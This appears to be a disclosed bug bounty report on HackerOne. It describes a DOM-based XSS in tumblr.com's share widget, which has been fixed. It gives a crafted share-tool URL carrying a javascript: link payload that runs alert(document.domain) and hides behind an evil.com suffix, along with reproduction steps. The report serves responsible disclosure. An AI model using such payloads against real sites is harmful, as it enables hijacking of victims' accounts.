DOM-Based XSS in tumblr.com

Disclosed: 2020-07-27 15:24:50 By keer0k To automattic
Medium
Vulnerability Details
# Description Hi, i just found a XSS that i think it's a valid issue and i think it is in scope this time. To get the XSS the attacker needs to create a post in tumblr.com using `https://www.tumblr.com/widgets/share/tool?url=https%3A%2F%2Fkeerok.github.io%2F&title=%3Ca%20href=%22javascript:alert(document.domain);//http://evil.com/%22%3Eclick%20me%3C/a%3E&selection=click%20in%20the%20link%20after%20reblog&shareSource=chrome_extension` URL and change the link of click me text to `javascript:alert(document.domain);//https://evil.com/` without the "denied:". After post the payload , the victim needs to reblog the post in www.tumblr.com and click in "click me" and in "open" to open in a new tab the URL, after this, XSS will be triggered. I also attached a video of the PoC: {F842750} # Steps to reproduce 1. go to `https://www.tumblr.com/widgets/share/tool?url=https%3A%2F%2Fkeerok.github.io%2F&title=%3Ca%20href=%22javascript:alert(document.domain);//http://evil.com/%22%3Eclick%20me%3C/a%3E&selection=click%20in%20the%20link%20after%20reblog&shareSource=chrome_extension` 2. remove "denied:" from click me link 3. save the post 4. victim reblog the post 5. click in "click me" 6. click in open (Abrir) 7. XSS will be triggered ## Impact it is possible to perform malicious actions on the victim's account
Actions
View on HackerOne
Report Stats
  • Report ID: 882546
  • State: Closed
  • Substate: resolved
  • Upvotes: 90
Share this report